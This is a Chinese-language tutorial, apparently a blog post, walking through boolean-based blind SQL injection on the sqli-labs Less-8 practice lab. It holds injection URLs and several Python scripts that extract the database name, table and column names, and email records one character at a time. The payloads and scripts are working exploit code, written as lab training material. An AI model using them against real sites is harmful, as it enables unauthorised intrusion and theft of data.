SQL注入之基于布尔的盲注详解

基于布尔的盲注

Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。

由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。

本次的示例就是Less-8。

通过进行下面的语句的注入测试

http://localhost/sqlilabs/Less-8/?id=2'
http://localhost/sqlilabs/Less-8/?id=2"
http://localhost/sqlilabs/Less-8/?id=2\

进行测试的时候,只有在id=2'的时候页面无法显示内容。输入的语句如果符合要求,页面就会显示内容,但是显示的内容都是一样的。这种情况下页面上的输出对于我们来说是完全没有用的,包括SQL执行出错的信息都不会在页面上显示。这种情况下之前的通过执行SQL语句然后在页面上显示SQL执行之后返回的信息完全是不可能的啦。这种情况下就是一个典型的SQL盲注了。

我们通过页面是否显示内容来判断我们的SQL语句是否正确,进而猜解数据库的信息。

通过上面的注入测试,我们知道后台的SQL的注入语句的写法是:

select field from table where id='userinput'

id参数是被单引号包括的。其他的信息我们就无法得到了。

得到数据库的名称

在得到数据库的名称之前,首先需要得到数据库的长度

http://localhost/sqlilabs/Less-8/?id=2' and length(database())>1 %23
http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23
以此类推
.....

发现当值为8的时候,页面就没有显示。那么说明database()的长度是8。

得到了datbase()的长度之后,接下来就是得到database()的名称了。

这个时候就不能完全靠手注了,必须编写Python代码来完成。其中最主要就是进行大量的注入测试来判断程序执行正确和出错的时机,然后断定当前的值可能就是正确的值。

下面就是一个简单的使用Python来进行布尔盲注获取数据的代码。

def get_db_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,9):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

得到最后的结果的是security,是正确的。

得到数据库中的表信息

其实所有的SQL注入步骤都是类似的。首先得到数据库的名称(这一步不是必须的),然后得到当前数据库的表名称,然后得到表的字段,最后进行脱裤。这个步骤在前一章已经有说明了。

首先看一个简单的SQL盲注获取数据库表信息的写法。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23

其实还是使用之前的select table_name from information_schema.tables where table_schema=database() limit 0,1这样的语句来得到表的信息,但是现在是无法在页面上显示的,而是通过盲注来一个字符一个字符的获取表名。

接下也同样是通过编写Python代码来获取表名了。代码也和上面的类似。主要就是修改中的URl。在进行Python获取表名之前,我们同样需要知道表名的长度。

使用如下的语句就可以得到了。

获取表名的SQL注入的写法就是如下

http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23

通过这种方式我们知道数据库表中的第一个表名的长度是6。知道了表名的长度之后,接下来的Python脚本就很好写了。

def get_table_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,7):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

最后得到了第一个表名是emails,如果要得到其他的表名只需要将代码limit 0,1修改成为limit 1,1或者是其他的就可以了。

得到表名的列信息

在得到列名之前,同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度,那么就可以使用如下的语句来获取。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>【num】 %23

修改num的值即可,从0开始一直到到程序出错。通过这种方法,我们得到在emails中存在2个字段,字段的长度分别是2,8。
得到了字段长度之后,接下来就是进行布尔注入得到字段名称了。

在编写代码之前,还是来看如何写获取字段名称的sql语句吧。下面这个代码就是用来获取字段名称的代码。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60 %23

我们编写的Python代码也是利用上面这个代码来获取字段名称。

def get_column_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,3):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

通过上面这个代码,我们可以得到在emails表中存在的字段名称分别是idemail_id

脱裤

在得到了字段名称之后,接下来最重要的一步就是进行脱裤了。
在进行脱裤之前,我们首先判断在emails表中有多少条记录。

使用的语句如下:

http://localhost/sqlilabs/Less-8/?id=2' and (select count(*) from emails)>0 %23

修改>0中的0依次为1,2,3之后,我们得到在emails表中一共存在8条记录。

那么接下来就是进行脱裤了。

在脱裤之前,我们首先要知道当前记录的长度,这个SQL语句也很好写。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(email_id) from emails limit 0,1)>15 %23

最后我们知道在emails表中的第一条记录中的email_id的长度是16.

知道了长度之后,代码就很好写了。

def get_data():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23"
 chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,17):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的长度只有706和722
   if length>706:
    result += char
    break
 print(result)

通过上面的这段代码就得到了内容是Dumb@dhakkan.com,其他的内容就同样通过这段方式得到数据了。这里就不作演示了。

总结

其实基于布尔盲注和基于时间的盲注都是需要编写大量的代码,就像本篇的文章一样。之前在简单的SQL注入中,一句SQL注入代码就可以解决的问题在这里就需要编写Python代码来进行大量的注入测试才能够得到内容。其实之前我也很少完整的用Python来编写SQL注入代码完成整个布尔盲注的注入过程。通过本章的编写,熟悉了使用Python代码完整地进行一次布尔盲注的过程了,学习了很多。以上就是这篇文章的全部内容了,希望对大家能有所帮助。

(0)

相关推荐

  • 浅谈mybatis中的#和$的区别 以及防止sql注入的方法

    mybatis中的#和$的区别 1. #将传入的数据都当成一个字符串,会对自动传入的数据加一个双引号.如:order by #user_id#,如果传入的值是111,那么解析成sql时的值为order by "111", 如果传入的值是id,则解析成的sql为order by "id". 2. $将传入的数据直接显示生成在sql中.如:order by $user_id$,如果传入的值是111,那么解析成sql时的值为order by user_id,  如果传入的

  • php简单实现sql防注入的方法

    本文实例讲述了php简单实现sql防注入的方法.分享给大家供大家参考,具体如下: 这里没有太多的过滤,主要是针对php和mysql的组合. 一般性的防注入,只要使用php的 addslashes 函数就可以了. 以下是一段copy来的代码: PHP代码: $_POST = sql_injection($_POST); $_GET = sql_injection($_GET); function sql_injection($content) { if (!get_magic_quotes_gpc

  • sql注入之手工注入示例详解

    前言 这篇文章就是一个最基本的SQl手工注入的过程了.基本上在sqlilabs上面的实验,如果知道了其中的全部知识点,都可以通过以下的步骤进行脱裤.下面的这个步骤也是其他的脱裤手段的基础.如果想要精通SQL注入,那么这个最基本的脱裤步骤是必须了解和掌握的. 为了方便说明,我们还是用之前的数字型的注入点为例来进行说明. 得到字段总数 在前面的介绍中,我们已经知道在http://localhost/sqlilabs/Less-2/?id=1id是一个注入点. 后台的SQL语句的写法大致为 selec

  • jquery过滤特殊字符',防sql注入的实现方法

    今天写的代码给项目经理看了下,因为之前没有考虑sql注入的问题,然后在他测试我的code的时候,打了一个"'",然后我的程序就挂了! 于是乎,我在网上找到了一个验证并过滤文本框的jquery! 先上图: PS:这里用@#测试,因为'太小了,都看不清楚了! 具体的jquery代码: <script type="text/javascript" language="javascript"> $(document).ready(functi

  • Sql注入原理简介_动力节点Java学院整理

    一.什么是sql注入呢? 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击.如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入. 黑客通过SQL注入攻击可以拿到网站数据库的访问

  • SQL注入绕过的技巧总结

    前言 sql注入在很早很早以前是很常见的一个漏洞.后来随着安全水平的提高,sql注入已经很少能够看到了.但是就在今天,还有很多网站带着sql注入漏洞在运行.稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤. SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的.这篇文章就是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着

  • java 过滤器filter防sql注入的实现代码

    实例如下: XSSFilter.java public void doFilter(ServletRequest servletrequest, ServletResponse servletresponse, FilterChain filterchain) throws IOException, ServletException { //flag = true 只做URL验证; flag = false 做所有字段的验证; boolean flag = true; if(flag){ //只

  • SQL注入之基于布尔的盲注详解

    基于布尔的盲注 Web的页面的仅仅会返回True和False.那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息. 由于本次是布尔注入,手注无法完整地进行脱裤.所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据.所以在这章里面会有很多的Python代码. 本次的示例就是Less-8. 通过进行下面的语句的注入测试 http://localhost/sqlilabs/Less-8/?id=2' http://localhost/sqli

  • SQL bool盲注和时间盲注详解

    目录 一.bool盲注和时间盲注常用函数 二.bool盲注和时间盲注payload 1.SQL注入点探测 2.猜解数据库名 3.猜解表名 4.猜解字段名 5.猜解数据 今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL bool盲注和时间盲注. 免责声明:本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!再次强调:严禁对未授权设备进行渗透测试! 一.bool盲注和时间盲注常用函数 1.休眠函数sleep()是SQL语句中用于休眠的函数,时间盲注

  • python实现布尔型盲注的示例代码

    好久没写python了,就想着写个简单的练练手,写个布尔型盲注自动化脚本,我觉得这个功能写的非常全了,这里是参考sqli-labs里面的盲注漏洞进行的脚本编写. 脚本运行时间:6分半左右 bool_sqlblind.py # -*- coding:utf-8 -*- # Author: mochu7 import requests def ascii_str():#生成库名表名字符所在的字符列表字典 str_list=[] for i in range(33,127):#所有可显示字符 str_

  • SQL行转列和列转行代码详解

    行列互转,是一个经常遇到的需求.实现的方法,有case when方式和2005之后的内置pivot和unpivot方法来实现. 在读了技术内幕那一节后,虽说这些解决方案早就用过了,却没有系统性的认识和总结过.为了加深认识,再总结一次. 行列互转,可以分为静态互转,即事先就知道要处理多少行(列);动态互转,事先不知道处理多少行(列). --创建测试环境 USE tempdb; GO IF OBJECT_ID('dbo.Orders') IS NOT NULL DROP TABLE dbo.Orde

  • 基于JavaScript表单脚本(详解)

    什么是表单? 一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法. 表单域:包含了文本框.密码框.隐藏域.多行文本框.复选框.单选框.下拉选择框和文件上传框等. 表单按钮:包括提交按钮.复位按钮和一般按钮:用于将数据传送到服务器上的CGI脚本或者取消输入,还可以用表单按钮来控制其他定义了处理脚本的处理工作. JavaScript与表单间的关系:JS最初的应用就是用于分担服务器处理表单的责任,打破依赖服务器的局面,尽管目前web和jav

  • 基于AngularJS的简单使用详解

    Angular Js 的初步认识和使用 一: 1.模块化 定义模块和控制器 ng-app="myapp" controller="myctrl" 指定模型 ng-model="" 获取的属性值: ng-bind="属性名"或者{{属性名}} 2.初始化模块(在Script中进行) var myapp1 =angular.module("myapp",[]); 3.定义模块的控制器,并依赖注入, $scope

  • 基于java Servlet编码/异常处理(详解)

    1. Servlet输出中文 (1)为什么会有乱码? out.println方法在输出时或者表单提交的时候,浏览器会对表单中的中文参数值进行编码; 注:会使用表单所在的页面打开时使用的编码方式进行编码服务器端默认会使用ISO-8859-1进行解码所以会产生乱码 (2)如何解决? 1)post请求:requset.setcharcterencoding(string charset);添加到所有获取参数前并且该方法只支持post方法 2)get请求:修改服务器设置 2. 读取请求参数值 (1)St

  • 基于Quartz定时调度任务(详解)

    简介 Quarzt是一个项目中定时执行任务的开源项目,Quartz是OpenSymphony开源组织在Job scheduling领域又一个开源项目,它可以与J2EE与J2SE应用程序相结合也可以单独使用,这里我们介绍和spring整合的例子 因为Spring已经整合Quarzt,所以我们只需要配置一下即可. 下载jar包 1.可以直接去http://www.quartz-scheduler.org/ Quarzt的官方网站下载jar包 2.可以通过Maven来构建,记得引入Spring所需要的

  • 基于注解的组件扫描详解

    在使用组件扫描时,需要现在XML配置中指定扫描的路径 <context:component-scan back-package="yangjq.test"> 容器实例化会扫描yangjq.test包及其子包下的所有组件类. 只有当组件类定义前面有下面的注解标记时,这些组件类才会被扫描到Spring容器 - @Component 通用注解 - @Name 通用注解 - @Repository 持久化层组件注解 - @Service 业务层组件注解 - @Controller

  • 基于Jexus-5.6.3使用详解

    一.Jexus Web Server配置 在 jexus 的工作文件夹中(一般是"/usr/jexus")有一个基本的配置文件,文件名是"jws.conf". jws.conf 中至少有 SiteConfigDir 和 SiteLogDir 两行信息: SiteConfigDir=siteconf #指的是存放网站配置文件放在siteconf这个文件夹中,可以使用基于jws.exe文件的相对路径 SiteLogDir=log #指的是jexus日志文件放在log这个

随机推荐